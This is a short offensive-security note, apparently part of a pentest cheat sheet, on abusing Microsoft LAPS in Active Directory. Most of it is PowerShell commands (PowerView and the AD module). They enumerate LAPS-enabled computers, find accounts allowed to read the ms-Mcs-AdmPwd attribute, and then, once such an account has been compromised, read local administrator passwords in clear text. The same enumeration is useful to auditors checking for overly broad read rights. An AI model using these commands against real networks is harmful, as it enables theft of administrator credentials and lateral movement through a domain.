<aside> ⚠️ To abuse LAPS is necessary to compromise a user that have privileges for read passwords LAPS in clear text, you must enumerate which users has allowed to read particolar password.

</aside>

The misconfiguration on part the of an administrators if they provide too many users access to read credentials in clear text.

Enumerate computers with LAPS GPO Enabled (PowerView):

Get-DomainComputer| ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null} | select dnsHostName

Enumerate computers with LAPS GPO Enabled (ADModule):

Get-Adcomputer -filter {ms-mcs-AdmPwdExpirationTime -like "*"} -Properties ms-Mcs-AdmPwdExpirationTime | select Name,DistinguishedName

Enumerate users who can read the passwords in clear text machines in OUs:

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs| ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier

The following command return also IdentityName in readable format:

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType-like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

Once we compromise the user which has the Rights, use the following to read clear-text passwords (in the security context of the privileged user)

PowerView:

Get-DomainObject -Identity "<targetmachine$>" | select -ExpandProperty "ms-mcs-admpwd"

ADModule:

Get-ADComputer -Identity "<targetmachine$>" -Properties "ms-mcs-admpwd" | select -ExpandProperty "ms-mcs-admpwd"